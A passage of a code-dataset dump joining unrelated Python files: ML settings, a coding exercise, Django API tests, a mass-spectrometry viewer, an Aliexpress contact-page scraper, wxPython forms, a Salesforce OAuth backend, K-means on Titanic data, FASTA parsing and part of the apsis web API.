range(7, 10), range(11))] + [\n (key, [1, 2, 3, 4]) for key in get_mystery(\n [20000, 30000, 40000, 50000], [10], range(11))]\n self.big_domain_dict = {key: item for key, item in self.big_domain_dict}\n\n # Settings for data_format = \"images\":\n if self.data_format == \"images\":\n self.batch_size = 100\n self.epochs = 10000\n self.loss_core = \"mse\"\n self.add_theory_quota = 0\n self.is_simplify_model = False\n self.is_simplify_domain = False\n\n # Settings for Lagrangian:\n if self.is_Lagrangian:\n self.num_input_steps = 3\n self.is_simplify_model = False\n\n self.is_pendulum = False\n","sub_path":"theory_learning/options.py","file_name":"options.py","file_ext":"py","file_size_in_byte":6520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"444952356","text":"def unsorted_subarray(array):\n #\n \"\"\"\n \"\"\"\n start, end = None, None\n current_min, current_max = None, None\n\n # Iterate through items\n for i in range(len(array) - 1):\n # Compare adjacent items and fill values if unsorted\n if start is None and end is None and array[i] > array[i + 1]:\n start = i\n end = i + 1\n current_min = array[i]\n current_max = array[i + 1]\n\n # If next item is smaller than current_min, need to sort to that point\n if current_min and array[i + 1] < current_min:\n end = i + 1\n current_min = array[i + 1]\n\n # If next item is smaller than current_max, need to sort to that point\n if current_max and array[i + 1] < current_max:\n end = i + 1\n\n # If next item is larger than current_max, update current_max\n if current_max and array[i + 1] > current_max:\n current_max = array[i + 1]\n\n return end - start + 1\n\n\nif __name__ == \"__main__\":\n print(unsorted_subarray([2, 6, 4, 8, 10, 9, 15]))\n","sub_path":"2020/a0581_unsorted_subarray.py","file_name":"a0581_unsorted_subarray.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"359655091","text":"# unit test, new blank database\n\nfrom rest_framework.test import APITestCase\nfrom django.contrib.auth import get_user_model\nfrom article.models import Article\nfrom rest_framework.reverse import reverse as api_reverse\nfrom rest_framework import status\nfrom rest_framework_jwt.settings import api_settings\nfrom django.test import Client\n\npayload_handler = api_settings.JWT_PAYLOAD_HANDLER\nencode_handler = api_settings.JWT_ENCODE_HANDLER\n\n\n\nUser = get_user_model()\n\nclass ArticleAPITestCase(APITestCase):\n def setUp(self):\n user = User(username='bdvuong', email='bdvuong@gmail.com')\n password = user.set_password('bdvuong1997')\n username = user.username\n user.save()\n\n # self.client = Client()\n # self.client.login(username=username, password=password)\n\n article = Article.objects.create(author= user,\n title='Original testing recipe',\n description='Original description',\n ingredient='Original ingres',)\n\n\n def test_single_user(self):\n user_count = User.objects.count()\n self.assertEqual(user_count, 1)\n\n\n def test_single_article(self):\n article_count = Article.objects.count()\n self.assertEqual(article_count, 1)\n\n # test the get list\n def test_get_list(self):\n data = {}\n url = api_reverse('article-api:article-listcreate')\n response = self.client.get(url, data, format='json')\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n #print(response.data)\n\n # test the post method\n def test_post_item(self):\n data = {\n 'title': 'New title',\n 'description':'New stuff',\n 'ingredient': 'New ingredient',\n }\n url = api_reverse('article-api:article-listcreate')\n response = self.client.post(url, data, format='json')\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\n print(response.data)\n # somehow giving not authentication were not provided, even in the below with JWT this error occur again\n\n # get individual item\n def test_get_item(self):\n article = Article.objects.first()\n data = {}\n url = article.get_api_url()\n response = self.client.get(url, data, format='json')\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n #print(response.data)\n\n #\n # # Test update and post at this endpoint without authentication\n # def test_update_item(self):\n # article = Article.objects.first()\n # url = article.get_api_url()\n # data = {\n # 'title': 'New title',\n # 'description': 'More New stuff',\n # 'ingredient': 'More new ingredient',\n # }\n # response = self.client.post(url, data, format='json')\n # self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)\n # # Method not allowed expected because we cannot post at this endpoint\n # #print(response.data)\n # response = self.client.put(url, data, format='json')\n # self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\n # #print(response.data)\n #\n #\n # # Test with authentication thru JWT\n # def test_update_item_with_user(self):\n # article = Article.objects.first()\n # print(article.description)\n # url = article.get_api_url()\n # data = {\n # 'title': 'New title',\n # 'description': 'More New stuff',\n # 'ingredient': 'More new ingredient',\n # }\n # user = User.objects.first()\n # payload = payload_handler(user)\n # token_response = encode_handler(payload)\n # self.client.credentials(HTTP_AUTHORIZATION='JWT' + token_response) # setting JWT token headers, JWT <token>\n # #print(token_response)\n # response = self.client.put(url, data, format='json')\n # self.assertEqual(response.status_code, status.HTTP_200_OK)\n # print(response.data)\n\n # def test_post_item_with_user(self):\n # article = Article.objects.first()\n # #print(article.description)\n # data = {\n # 'title': 'New title',\n # 'description': 'More New stuff',\n # 'ingredient': 'More new ingredient',\n # }\n # user = User.objects.first()\n # payload = payload_handler(user)\n # token_response = encode_handler(payload)\n # self.client.credentials(HTTP_AUTHORIZATION='JWT' + token_response) # setting JWT token headers, JWT <token>\n # print(token_response)\n # url = article.get_api_url()\n # response = self.client.put(url, data, format='json')\n # self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n # print(response.data)\n","sub_path":"Blog/article/api/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":4858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"486371327","text":"\"\"\"\nVery basic 2D viewer, allowing to pick pixels\nand select m/z\n\"\"\"\n\nimport argparse\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport esmraldi.imzmlio as imzmlio\nfrom esmraldi.spectralviewer import SpectralViewer\n\ndef onclick(event):\n x,y = int(event.xdata), int(event.ydata)\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-i\", \"--input\", help=\"Input ITK image or imzML file\")\nparser.add_argument(\"--memmap\", help=\"Create and read a memmap file\", action=\"store_true\")\n\nargs = parser.parse_args()\n\ninputname = args.input\nis_memmap = args.memmap\n\n\nif inputname.lower().endswith(\".imzml\"):\n memmap_dir = os.path.dirname(inputname) + os.path.sep + \"mmap\" + os.path.sep\n memmap_basename = os.path.splitext(os.path.basename(inputname))[0]\n memmap_image_filename = memmap_dir + memmap_basename + \".npy\"\n memmap_spectra_filename = memmap_dir + memmap_basename + \"_spectra.npy\"\n memmap_files_exist = (os.path.exists(memmap_dir)\n and os.path.exists(memmap_image_filename)\n and os.path.exists(memmap_spectra_filename))\n\n if is_memmap and memmap_files_exist:\n print(\"Reading from memmap\")\n spectra = np.load(memmap_spectra_filename, mmap_mode=\"r\")\n image = np.load(memmap_image_filename, mmap_mode=\"r\")\n else:\n imzml = imzmlio.open_imzml(inputname)\n mz, I = imzml.getspectrum(0)\n spectra = imzmlio.get_full_spectra(imzml)\n max_x = max(imzml.coordinates, key=lambda item:item[0])[0]\n max_y = max(imzml.coordinates, key=lambda item:item[1])[1]\n max_z = max(imzml.coordinates, key=lambda item:item[2])[2]\n image = imzmlio.get_images_from_spectra(spectra, (max_x, max_y, max_z))\n\n if is_memmap:\n os.makedirs(memmap_dir, exist_ok=True)\n np.save(memmap_image_filename, image)\n np.save(memmap_spectra_filename, spectra)\n\nprint(image)\nif len(image.shape) == 4:\n image = image[0, ...]\n\nimage = image.transpose((1, 0, 2))\nprint(spectra.shape)\nfig, ax = plt.subplots(3, 1)\ntracker = SpectralViewer(ax, image, spectra)\nfig.canvas.mpl_connect('button_press_event', tracker.onclick)\nplt.show()\n","sub_path":"examples/2D_viewer.py","file_name":"2D_viewer.py","file_ext":"py","file_size_in_byte":2187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"582401396","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# SPDX-License-Identifier: Apache-2.0\n\"\"\"\nPython Package for controlling Alexa devices (echo dot, etc) programmatically.\n\nFor more details about this api, please refer to the documentation at\nhttps://gitlab.com/keatontaylor/alexapy\n\"\"\"\ntry:\n from importlib_metadata import version\nexcept ModuleNotFoundError:\n from importlib.metadata import version\nfrom .alexaapi import AlexaAPI\nfrom .alexalogin import AlexaLogin\nfrom .alexawebsocket import WebsocketEchoClient\nfrom .errors import (\n AlexapyConnectionError,\n AlexapyLoginCloseRequested,\n AlexapyLoginError,\n)\nfrom .helpers import hide_email, hide_serial, obfuscate\n\n__version__ = version(\"alexapy\")\n\n__all__ = [\n \"AlexaLogin\",\n \"AlexaAPI\",\n \"AlexapyConnectionError\",\n \"AlexapyLoginCloseRequested\",\n \"AlexapyLoginError\",\n \"WebsocketEchoClient\",\n \"hide_email\",\n \"hide_serial\",\n \"obfuscate\",\n \"__version__\",\n]\n","sub_path":"alexapy/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"638781501","text":"#coding:utf-8\n__author__ = '613108'\n\nimport sys,csv,urllib2,re\nreload(sys)\nsys.setdefaultencoding('utf-8')\nsys.path.append(r'C:\\Users\\613108\\Desktop\\Project\\Vertical_ecommerce_project\\VIP_project')\nsys.path.append(r'C:\\Users\\613108\\Desktop\\Project\\tool_self\\Tool_self')\nimport get_phone_search,My_Csv,list_split\nfrom Queue import Queue\nfrom threading import Thread\nfrom bs4 import BeautifulSoup\n\nclass Get_contact_detail(Thread):\n def __init__(self,href_list):\n Thread.__init__(self)\n self.href_list=href_list\n\n def get_info(self):\n send_headers = {\n 'Referer':'www.alibaba.com',\n 'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',\n 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'Connection':'keep-alive'\n }\n pat=re.compile(r'\\n')\n for url in self.href_list:\n try:\n r=urllib2.Request(url=url[1],headers=send_headers)\n res=urllib2.urlopen(r)\n result=res.read()\n res.close()\n soup=BeautifulSoup(result,from_encoding='utf-8')\n frame=soup.find(attrs={'class':'m-content'})\n name=frame.find(attrs={'class':'name'}).text\n name=re.sub(pat,'',name)\n try:department=frame.find(attrs={'class':'dl-horizontal'}).dd.text\n except:department='-'\n sec_frame=frame.find(attrs={'class':'contact-detail'})\n sec_frames=sec_frame.find_all(re.compile(r'd.+?'))[1:]\n tel_phone='-';address='-';province='-';city='-';mobile_phone='-';fax_num='-'\n for i in range(len(sec_frames)):\n if sec_frames[i].text=='Telephone:':\n tel_phone=sec_frames[i+1].contents[0]\n elif sec_frames[i].text=='Address:':\n address=sec_frames[i+1].contents[0]\n elif sec_frames[i].text=='Province/State:':\n province=sec_frames[i+1].contents[0]\n elif sec_frames[i].text=='City:':\n city=sec_frames[i+1].contents[0]\n elif sec_frames[i].text=='Mobile Phone:':\n mobile_phone=sec_frames[i+1].contents[0]\n elif sec_frames[i].text=='Fax:':\n fax_num=sec_frames[i+1].contents[0]\n else:continue\n result=[url[0],url[1],name,department,tel_phone,mobile_phone,fax_num,address,province,city]\n queue_for_result.put(result)\n print(result)\n except:\n print('*'*20+u'程序运行失误,已跳过'+'*'*20+url[1])\n\n def run(self):\n self.get_info()\n\nif __name__=='__main__':\n file_name='d:/spider/aliexpress/aliexpress_contact_href_2015-08-06.csv'\n href_temp=[]\n queue_for_result=Queue(0)\n with open(file_name,'r') as csv_file:\n reader=csv.reader(csv_file)\n for row in reader:\n href_temp.append(row)\n href_temp=href_temp[1:]\n href_temp_2=list_split.list_split(href_temp,2)\n Get_contact_detail_thread=[]\n for item in href_temp_2:\n Get_contact_detail_thread.append(Get_contact_detail(item))\n for item in Get_contact_detail_thread:\n item.start()\n for item in Get_contact_detail_thread:\n item.join()\n\n data=[]\n for i in range(queue_for_result.qsize()):\n data.append(queue_for_result.get())\n title=['shop_name','contact_page_href','contact_name','department','tel_phone','mobile_phone','fax_num','address','province','city']\n writer=My_Csv.Write_Csv(path='D:/spider/aliexpress',name='aliexpress_contact_detail',title=title,result=data)\n writer.add_title_data()\n print('*'*20+u'程序运行完毕,请检查数据'+'*'*20)\n","sub_path":"Aliexpress_project/contact_detail.py","file_name":"contact_detail.py","file_ext":"py","file_size_in_byte":3860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"280051075","text":"\nimport datetime\nimport wx\nimport wx.adv\nfrom desk.base.panels import *\nfrom desk.base.models import ValidationError\nfrom desk.persona.models import Persona\nfrom fuente.var import *\n\n\n\nclass PersonaPanel(wx.Panel):\n \"\"\"\n Panel de vista para el personas.\n \"\"\"\n def __init__(self, *args, **kwargs):\n \n wx.Panel.__init__(self, *args, **kwargs)\n self.model = Persona()\n\n # Controles\n self.nb1 = wx.Notebook(self, -1, name=\"notebook1\")\n self.panel1 = ListPanel(self.nb1, 1, name=\"persona_list\")\n self.panel2 = DetailPanel(self.nb1, 2, name=\"persona_detail\")\n\n # Eventos\n self.Bind(wx.EVT_BUTTON, self.OnAdd, self.panel1.button3)\n self.Bind(wx.EVT_LIST_ITEM_ACTIVATED, self.OnEdit, self.panel1.lc1)\n\n # Inicializacion\n self.__set_properties()\n self.__do_layout()\n\n def __set_properties(self):\n self.panel1.SetImageList(\"persona\", 24)\n self.panel1.SetColumns(todas=False, model=self.model)\n self.panel1.SetItems(self.model.GetQueryset())\n \n def __do_layout(self):\n s1 = wx.BoxSizer(wx.VERTICAL)\n self.nb1.AddPage(self.panel1, \"Listado\")\n self.nb1.AddPage(self.panel2, \"Detalle\")\n s1.Add(self.nb1, 1, wx.EXPAND|wx.ALL, 0)\n self.SetSizer(s1)\n self.Layout()\n\n def OnAdd(self, event):\n dlg = BaseDialog(self, -1, \"Agregar persona\", style=wx.RESIZE_BORDER|wx.DEFAULT_DIALOG_STYLE)\n dlg.SetPanel(PersonaFormPanel(dlg, -1))\n if (dlg.ShowModal() == wx.ID_OK):\n self.SetItems()\n event.Skip()\n\n def OnEdit(self, event):\n i = self.panel1.lc1.GetFirstSelected()\n id = self.panel1.lc1.GetItem(i, 0).GetText()\n\n dlg = BaseDialog(self, -1, \"Modificar persona\", style=wx.RESIZE_BORDER|wx.DEFAULT_DIALOG_STYLE)\n dlg.SetPanel(PersonaFormPanel(dlg, -1, selection=id))\n if (dlg.ShowModal() == wx.ID_OK):\n self.SetItems()\n event.Skip()\n\n def SetItems(self, fieldname=\"\", fieldvalue=\"\", todas=False):\n self.panel1.SetColumns(self.model)\n self.panel1.SetItems(self.model.GetQueryset(fieldname=fieldname, fieldvalue=fieldvalue, todas=todas))\n \n\n\n\n\nclass PersonaFormPanel(wx.Panel):\n \"\"\"\n Formulario para creación y modificación de personas.\n \"\"\"\n def __init__(self, *args, **kwargs):\n\n try:\n self.selection = kwargs.pop(\"selection\")\n except (KeyError):\n self.selection = None\n self.model = Persona()\n self.model.New()\n else:\n self.model = Persona().Select(fieldname=\"id\", fieldvalue=self.selection)\n\n wx.Panel.__init__(self, *args, **kwargs)\n\n # Controles\n self.id = wx.TextCtrl(self, -1, name=\"id\", size=(120, -1), style=wx.TE_READONLY)\n self.identificacion = wx.TextCtrl(self, -1, name=\"identificacion\", size=(150, -1))\n self.identificacion_type = wx.ComboBox(self, -1, name=\"identificacion_type\", choices=list(dict(IDENTIFICACION_CHOICES).keys()), style=wx.CB_READONLY)\n self.nombre = wx.TextCtrl(self, -1, name=\"nombre\", size=(300, -1))\n self.razon_social = wx.TextCtrl(self, -1, name=\"razon_social\", size=(300, -1))\n self.nacimiento = wx.adv.DatePickerCtrl(self, id=-1, style=wx.adv.DP_ALLOWNONE)\n self.email = wx.TextCtrl(self, -1, name=\"email\", size=(200, -1))\n self.telefono = wx.TextCtrl(self, -1, name=\"telefono\", size=(150, -1))\n self.direccion = wx.TextCtrl(self, -1, name=\"direccion\", style=wx.TE_MULTILINE, size=(300, 50))\n self.es_suplidor = wx.CheckBox(self, -1, \"\")\n self.imagen_perfil = wx.BitmapButton(self, -1, size=(128, 128), bitmap=wx.Bitmap(GETIMG(\"persona\", 128)))\n\n self.button_save = wx.Button(self, wx.ID_SAVE, \"Guardar\")\n self.button_cancel = wx.Button(self, wx.ID_CANCEL, \"Cancelar\")\n\n # Eventos.\n self.Bind(wx.EVT_BUTTON, self.OnSave, id=wx.ID_SAVE)\n\n self.__do_layout()\n self.__set_properties()\n\n if (self.model):\n self.SetValues()\n \n\n def __set_properties(self):\n # Propiedades de las fields.\n self.identificacion.SetMaxLength(20)\n self.nombre.SetMaxLength(100)\n self.razon_social.SetMaxLength(100)\n self.email.SetMaxLength(100)\n self.telefono.SetMaxLength(20)\n self.direccion.SetMaxLength(256)\n\n # Establecemos las propiedades.\n for field in self.model.GetFields(todas=True):\n try:\n ctrl = getattr(self, field.name)\n ctrl.SetSize((500, -1))\n except (AttributeError) as e:\n print(e)\n continue\n \n def __do_layout(self):\n s1 = wx.BoxSizer(wx.VERTICAL)\n\n s2 = wx.FlexGridSizer(cols=2, vgap=5, hgap=10)\n\n for field in self.model.GetFields(todas=True):\n try:\n ctrl = getattr(self, field.name)\n except (AttributeError):\n continue\n label = wx.StaticText(self, -1, field.verbose_name)\n s2.Add(label, 0, wx.ALIGN_RIGHT)\n s2.Add(ctrl, 1)\n \n s1.Add(s2, 1, wx.EXPAND|wx.ALL, 10)\n\n s3 = wx.BoxSizer(wx.HORIZONTAL)\n s3.Add(self.button_save, 0, wx.ALL, 5)\n s3.Add(self.button_cancel, 0, wx.ALL, 5)\n s1.Add(s3, 0, wx.ALL, 0)\n\n self.SetSizer(s1)\n s1.Fit(self)\n self.Layout()\n\n def OnSave(self, event):\n # Guardamos los datos.\n try:\n self.model.SaveForm(self)\n except (ValidationError) as e:\n return wx.MessageBox(str(e))\n try:\n self.Parent.EndModal(wx.ID_OK)\n except (BaseException) as e:\n print(e)\n event.Skip()\n\n def SetValues(self):\n self.id.SetValue(str(self.model.id))\n self.identificacion.SetValue(str(self.model.identificacion))\n self.identificacion_type.SetValue(str(self.model.identificacion_type))\n self.nombre.SetValue(str(self.model.nombre))\n self.razon_social.SetValue(str(self.model.razon_social))\n\n try:\n self.nacimiento.SetValue(self.model.nacimiento.ToDate())\n except (BaseException) as e:\n self.nacimiento.SetValue(wx.DefaultDateTime)\n\n self.email.SetValue(str(self.model.email))\n self.telefono.SetValue(str(self.model.telefono))\n self.direccion.SetValue(str(self.model.direccion))\n try:\n self.es_suplidor.SetValue(self.model.es_suplidor.value)\n except (TypeError):\n self.es_suplidor.SetValue(0)\n self.imagen_perfil.SetBitmapLabel(self.model.imagen_perfil.ToBitmap())","sub_path":"desk/persona/panels.py","file_name":"panels.py","file_ext":"py","file_size_in_byte":6681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"386963079","text":"\"\"\"\nsettings.py should include the following: \n SALESFORCE_CLIENT_ID = '...' \n SALESFORCE_CLIENT_SECRET = '...'\n\n Optional scope to include:\n\tapi: Allows access to the current, logged-in user's account over the APIs, such as the REST API or Bulk API.\n\tchatter_api: Allows access to only the Chatter API URLs.\n\tfull: Allows access to all data accessible by the current, logged-in user.\n\tid: Allows access only to the Identity Service\n\trefresh_token: Allows a refresh token to be returned if you are eligible to receive one.\n\tvisualforce: Allows access to Visualforce pages\n\tweb: Allows the ability to use the access_token on the web.\n\n\tIf you do not supply a scope parameter, it will default to: id api refresh_token\n\n SALESFORCE_AUTH_EXTRA_ARGUEMENTS = {'scope': 'id api refresh_token'}\n SALESFORCE_DISPLAY_PARAM = ''\n\n\n More information on scope can be found at:\n http://wiki.developerforce.com/page/Digging_Deeper_into_OAuth_2.0_on_Force.com\n\"\"\"\nfrom urllib import urlencode\n\nfrom django.utils import simplejson\n\nfrom social_auth.backends import BaseOAuth2, OAuthBackend\nfrom social_auth.utils import dsa_urlopen, setting\n\nfrom oauth2 import Token\n\n\nSALESFORCE_DOMAIN = 'login.salesforce.com'\nSALESFORCE_TEST_DOMAIN = 'test.salesforce.com'\n\nSALESFORCE_TESTING = setting('SALESFORCE_TESTING',False)\nSALESFORCE_SERVER = \"https://\" + (SALESFORCE_TEST_DOMAIN if SALESFORCE_TESTING else SALESFORCE_DOMAIN)\n\nSALESFORCE_AUTHORIZATION_PATH = '/services/oauth2/authorize'\nSALESFORCE_ACCESS_TOKEN_PATH = '/services/oauth2/token'\n\n\nSALESFORCE_AUTHORIZATION_URL = SALESFORCE_SERVER + SALESFORCE_AUTHORIZATION_PATH\nSALESFORCE_ACCESS_TOKEN_URL = SALESFORCE_SERVER + SALESFORCE_ACCESS_TOKEN_PATH\n\nclass SalesforceBackend(OAuthBackend):\n name = 'salesforce'\n\n EXTRA_DATA = [\n ('user_id', 'user_id'),\n ('asserted_user', 'asserted_user'),\n ('organization_id','organization_id'),\n ('username','username'),\n ('display_name', 'display_name'),\n ('email', 'email'),\n ('status','status'),\n ('photos','photos'),\n ('urls','urls'),\n ('refresh_token', 'refresh_token', True),\n ]\n\n def get_user_id(self, details, response):\n return response['user_id']\n\n def get_user_details(self, response):\n \"\"\"Return user details from Salesforce account\"\"\"\n username = response['username']\n first_name = response['display_name'].split(' ')[0]\n last_name = response['display_name'].split(' ')[-1]\n email = response['email']\n return {\n 'username': username,\n 'first_name': first_name,\n 'last_name': last_name,\n 'email': email,\n }\n\n\nclass SalesforceAuth(BaseOAuth2):\n \"\"\"Salesforce OAuth mechanism\"\"\"\n AUTHORIZATION_URL = SALESFORCE_AUTHORIZATION_URL\n ACCESS_TOKEN_URL = SALESFORCE_ACCESS_TOKEN_URL\n AUTH_BACKEND = SalesforceBackend\n SETTINGS_KEY_NAME = 'SALESFORCE_CLIENT_ID'\n SETTINGS_SECRET_NAME = 'SALESFORCE_CLIENT_SECRET'\n # REDIRECT_STATE = False\n # STATE_PARAMETER = False\n\n def user_data(self, access_token, *args, **kwargs):\n \"\"\"Loads user data from service\"\"\"\n response = kwargs.get('response') or {}\n import urllib2\n headers = {'Authorization': 'Bearer ' + access_token}\n req = urllib2.Request(response.get('id'), headers=headers)\n try:\n return simplejson.load(urllib2.urlopen(req))\n except ValueError:\n return None\n\n\n# Backend definition\nBACKENDS = {\n 'salesforce': SalesforceAuth,\n}\n","sub_path":"social_auth/backends/contrib/salesforce.py","file_name":"salesforce.py","file_ext":"py","file_size_in_byte":3565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"128242935","text":"import pandas as pd \nimport numpy as np \nfrom sklearn.cluster import KMeans\ndf = pd.read_excel('titanic.xls')\ndf.drop(['body','name'],1,inplace = True)\ndf.convert_objects(convert_numeric= True)\ndf.fillna(0, inplace = True)\n# print(df.columns.values)\ndef handle_non_numerical_data(df):\n columns = df.columns.values\n for column in columns:\n x = 0\n digit_dict = {}\n def convert_to_int(val):\n return digit_dict[val]\n if df[column].dtype != np.float64 and df[column].dtype != np.int64:\n df_val = list(set(df[column]))\n for val in df_val:\n if val not in digit_dict:\n digit_dict[val] = x\n x += 1 \n # print(list(map(convert_to_int,df[column])))\n df[column] = list(map(convert_to_int,df[column])) \n return df\ndf = handle_non_numerical_data(df)\nX = np.array(df.drop(['survived'],1).astype(float))\ny = np.array(df['survived'])\nprint(X)\nprint(y)\nclf = KMeans(n_clusters=2)\nclf.fit(X)","sub_path":"Algorithm code/K-mean with titanic.py","file_name":"K-mean with titanic.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"29331909","text":"import os\nfrom Bio import SeqIO\n\nMainDir = '/home/deepti/Documents/test_data'\nOutDir = '/home/deepti/Documents/test_data_output'\n\n\nif os.path.exists(MainDir):\n\tfor d1 in os.listdir(MainDir): \n\n\t\tDir1 = os.path.join(MainDir, d1) \n\t\td ={}\n\t\tm ={}\n\t\tif os.path.exists(OutDir):\n\t\t\toutd1 = os.path.join(OutDir, d1)\n\t\t\tos.makedirs(outd1+'_output')\n\t\t\toutd2 = os.path.join(outd1+'_output')\n\t\t\toutputfasta = open(os.path.join(outd2, d1+'.fasta'), 'w')\n\t\t\toutputlog = open(os.path.join(outd2, d1+'.log.txt'), 'w')\n\t\n\t\t\t\n\t\t\tfor d2 in os.listdir(Dir1):\n\t\t\t\tDir2 = os.path.join(Dir1, d2)\n\t\t\t\t#print(Dir2)\n\t\t\t\tfor files in os.listdir(Dir2):\n\t\t\t\t\tfilePath= Dir2+\"/\"+files\n\t\t\t\t\t#print(filePath)\n\t\t\t\t\tfh = open(filePath)\n\t\t\t\t\tfor seq_record in SeqIO.parse(fh, 'fasta'):\n\t\t\t\t\t\tseq = str(seq_record.seq)\n\t\t\t\t\t\tif seq not in d:\n\t\t\t\t\t\t\td[seq] = []\n\t\t\t\t\t\td[seq].append(seq_record.id)\n\t\t\t\t\t\tlogVar=seq_record.id+\"\\t\"+files\n\t\t\t\t\t\t#print(logVar)\n\t\t\t\t\t\tif seq_record.id not in m:\n\t\t\t\t\t\t\tm[seq_record.id] = []\n\t\t\t\t\t\tm[seq_record.id].append(files)\n\t\t\t\tfh.close() #output.fasta\n\t\t\t\n\t\t\tfor seqs, ids in d.items(): \n\t\t\t\t#print(seqs,ids)\n\t\t\t\toutputfasta.write('>'+'#'.join(ids)+'\\n'+ seqs +'\\n')\n\t\t\t\t\n\t\t\tfor ids, filenames in m.items():\n\t\t\t\t#print(ids,filenames)\n\t\t\t\t#print(type(filenames))\n\t\t\t\t#uniqFileNames= list(set(filenames))\n\t\t\t\t#print(ids,\"\\t\",uniqFileNames)\n\t\t\t\toutputlog.write(ids+'\\t'+Dir2+'/'+','.join(filenames)+'\\n') \n","sub_path":"Parse_dict_fasta.py","file_name":"Parse_dict_fasta.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"369472323","text":"#!/usr/bin/env python\n\"\"\"Example process file.\"\"\"\n\nfrom mapchete import MapcheteProcess\nfrom shapely.geometry import shape\n\n\nclass Process(MapcheteProcess):\n \"\"\"Main process class.\"\"\"\n\n def __init__(self, **kwargs):\n \"\"\"Process initialization.\"\"\"\n # init process\n MapcheteProcess.__init__(self, **kwargs)\n self.identifier = \"my_process_id\",\n self.title = \"My long process title\",\n self.version = \"0.1\",\n self.abstract = \"short description on what my process does\"\n\n def execute(self):\n \"\"\"User defined process.\"\"\"\n # Reading and writing data works like this:\n with self.open(\"file1\") as vector_file:\n if vector_file.is_empty():\n # This assures a transparent tile instead of a pink error tile\n # is returned when using mapchete serve.\n return \"empty\"\n return [\n dict(\n geometry=feature[\"geometry\"],\n properties=dict(\n name=feature[\"properties\"][\"NAME_0\"],\n id=feature[\"properties\"][\"ID_0\"],\n area=shape(feature[\"geometry\"]).area\n )\n )\n for feature in vector_file.read()\n ]\n","sub_path":"test/testdata/geojson_test.py","file_name":"geojson_test.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"51160845","text":"import asyncio\nimport logging\nimport ora\nimport re\nimport sanic\nimport ujson\nfrom urllib.parse import unquote\nimport websockets\n\nfrom apsis.apsis import reschedule_runs\nfrom apsis.lib.api import response_json, error, time_to_jso, to_bool\nimport apsis.lib.itr\nfrom apsis.lib.timing import Timer\nfrom ..jobs import jso_to_job, reruns_to_jso\nfrom ..runs import Instance, Run, RunError\n\nlog = logging.getLogger(__name__)\n\n# Max number of runs to send in one websocket message.\nWS_RUN_CHUNK = 1024\nWS_RUN_CHUNK_SLEEP = 0.001\n\n#-------------------------------------------------------------------------------\n\nAPI = sanic.Blueprint(\"v1\")\n\n@API.exception(RunError)\ndef no_such_process_error(request, exception):\n return error(exception, status=400)\n\n\n#-------------------------------------------------------------------------------\n\ndef to_state(state):\n return None if state is None else Run.STATE[state]\n\n\ndef _to_jso(obj):\n return None if obj is None else {\n **obj.to_jso(),\n \"str\": str(obj),\n }\n\n\ndef _job_to_jso(app, job):\n return {\n \"job_id\" : job.job_id,\n \"params\" : list(sorted(job.params)),\n \"schedules\" : [ _to_jso(s) for s in job.schedules ],\n \"program\" : _to_jso(job.program),\n \"condition\" : [ _to_jso(c) for c in job.conds ],\n \"actions\" : [ _to_jso(a) for a in job.actions ],\n \"reruns\" : reruns_to_jso(job.reruns),\n \"metadata\" : job.meta,\n \"ad_hoc\" : job.ad_hoc,\n \"url\" : app.url_for(\"v1.job\", job_id=job.job_id),\n }\n\n\n# FIXME: Clean up, or put back caching.\n# No caching; jobs may change.\njob_to_jso = _job_to_jso\n\n\ndef _run_summary_to_jso(app, run):\n jso = run._jso_cache\n if jso is not None:\n # Use the cached JSO.\n return jso\n\n actions = {}\n # Start a scheduled job now.\n if run.state == run.STATE.scheduled:\n actions[\"cancel\"] = app.url_for(\"v1.run_cancel\", run_id=run.run_id)\n actions[\"start\"] = app.url_for(\"v1.run_start\", run_id=run.run_id)\n # Retry is available if the run didn't succeed.\n if run.state in {run.STATE.failure, run.STATE.error}:\n actions[\"rerun\"] = app.url_for(\"v1.run_rerun\", run_id=run.run_id)\n # Terminate and kill are available for a running run.\n if run.state == run.STATE.running:\n actions[\"terminate\"] = app.url_for(\n \"v1.run_signal\", run_id=run.run_id, signal=\"SIGTERM\")\n actions[\"kill\"] = app.url_for(\n \"v1.run_signal\", run_id=run.run_id, signal=\"SIGKILL\")\n\n jso = run._jso_cache = {\n \"url\" : app.url_for(\"v1.run\", run_id=run.run_id),\n \"job_id\" : run.inst.job_id,\n \"job_url\" : app.url_for(\"v1.job\", job_id=run.inst.job_id),\n \"args\" : run.inst.args,\n \"run_id\" : run.run_id,\n \"state\" : run.state.name,\n \"message\" : run.message,\n \"times\" : { n: time_to_jso(t) for n, t in run.times.items() },\n 